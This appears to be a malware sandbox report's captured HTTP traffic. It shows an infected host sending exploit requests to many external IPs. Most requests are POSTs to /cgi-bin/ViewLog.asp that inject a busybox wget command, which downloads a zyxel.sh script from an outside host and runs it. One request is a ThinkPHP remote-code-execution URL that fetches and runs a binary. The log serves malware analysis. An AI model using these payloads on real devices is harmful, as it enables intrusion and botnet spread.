                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1004192.168.2.155886485.66.169.1758080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:10.687622070 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:10.910819054 CET979INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 783
                                                      Date: Wed, 14 Feb 2024 08:31:10 GMT
                                                      Keep-Alive: timeout=20
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 34 33 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.43 (Debian)</h3></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1005192.168.2.154028695.86.97.118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:10.764213085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1006192.168.2.155582231.7.79.698080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:10.878576994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1007192.168.2.154441294.187.181.1868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:10.997220993 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1008192.168.2.154863488.221.180.11980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.284538984 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:11.474150896 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:31:11 GMT
                                                      Date: Wed, 14 Feb 2024 08:31:11 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 33 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 37 31 26 23 34 36 3b 32 64 63 63 66 65 38 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e33e1202&#46;1707899471&#46;2dccfe8e</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1009192.168.2.154190694.125.165.1338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.453191042 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:11.651920080 CET534INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:31:11 GMT
                                                      Server: Apache/2.4.57 (Debian) mod_fcgid/2.3.9
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1010192.168.2.154523885.214.74.498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.474347115 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:11.693643093 CET1156INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:31:11 GMT
                                                      Server: Apache
                                                      Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' ssh: rdp:; img-src 'self' data: https://*.tile.openstreetmap.org/ ; connect-src 'self' https://crash.checkmk.com/ https://license.checkmk.com/api/verify; frame-ancestors 'self' ; base-uri 'self'; form-action 'self' javascript: 'unsafe-inline'; object-src 'self'; worker-src 'self' blob:
                                                      Permissions-Policy: accelerometer=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), usb=()
                                                      X-Frame-Options: sameorigin
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      Referrer-Policy: origin-when-cross-origin
                                                      X-Content-Type-Options: nosniff
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1011192.168.2.154179462.29.44.258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.503611088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1012192.168.2.155665894.122.73.1788080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.504997015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1013192.168.2.154129295.10.61.2398080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.511392117 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1014192.168.2.155522662.150.141.2458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.536650896 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:11.816838980 CET109INHTTP/1.1 302 Found
                                                      Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1015192.168.2.155966085.122.205.98080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.580451012 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1016192.168.2.154892094.110.172.1378080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.590437889 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1017192.168.2.154616631.136.48.2108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.599473953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:12.279130936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
